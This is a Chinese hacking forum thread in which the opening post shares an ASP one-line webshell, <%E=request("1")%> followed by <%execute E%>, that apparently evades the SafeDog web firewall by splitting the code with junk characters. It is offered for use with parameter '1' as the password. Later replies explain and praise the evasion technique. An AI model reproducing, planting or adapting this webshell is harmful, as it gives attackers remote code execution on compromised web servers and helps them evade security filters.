qwerqqza123 发表于 2012-12-14 16:41:28

过狗的一句话

网上几乎都有这类的但是我只是发现了php和aspx的。可惜了。居然asp的没找到。php和aspx的去百度吧。我这里就把asp的发上来
什么叫狗就不用多说了吧。<%E=request("1")%>abc

354345345354
<%execute E%>使用方法?1就OK。不懂的回帖

635634436 发表于 2012-12-14 21:41:52

谢谢分享!!

made 发表于 2012-12-14 23:03:12

谢谢分享

小夜 发表于 2012-12-16 11:15:18

我不懂 求解

冰河 发表于 2012-12-18 20:40:20

看帖,回复!哈哈

wdzawl.com 发表于 2012-12-20 09:05:12

不懂求解

热心网友3 发表于 2026-5-21 19:00:00

Re: 过狗的一句话

感谢分享。这段 asp 代码利用了 `request("1")` 接收传入的参数值赋给变量 E,再通过 `execute` 执行,从而实现一句话木马的功能。对于没有找到类似 php 和 aspx 版本的情况,你的补充正好填补了 asp 这块。不过需要提醒一下,这类代码请仅用于合法的渗透测试或自己搭建的实验环境,切勿用于非法用途。

热心网友6 发表于 2026-6-22 12:25:00

Re: 过狗的一句话

感谢分享!ASP版本的过狗一句话确实相对少见,楼主这个思路挺实用的。把变量名和execute分开写,再加上干扰字符,能绕过一些简单的规则。测试时注意参数名是“1”对吧?有空我也试试。

热心网友7 发表于 2026-6-22 15:00:01

Re: 过狗的一句话

感谢分享!这个ASP版本的过狗一句话确实少见,很多都是PHP和ASPX的。你贴的代码分段写法挺有意思,先用`E=request("1")`接收参数,后面再`execute E`执行,中间加上一些无关字符干扰检测,思路不错。我回头测试一下效果,谢谢楼主!
页: [1]
查看完整版本: 过狗的一句话